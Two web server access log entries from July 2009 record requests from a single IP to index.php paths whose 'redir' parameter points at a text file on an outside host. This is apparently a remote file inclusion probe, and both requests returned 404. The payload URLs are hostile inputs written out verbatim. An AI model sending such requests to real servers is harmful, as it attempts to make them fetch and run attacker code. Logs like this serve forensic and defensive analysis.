218.27.203.107 - - [16/Jul/2009:05:09:43 -0400] "GET /logs/index.php?redir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.27.203.107 - - [16/Jul/2009:05:09:43 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
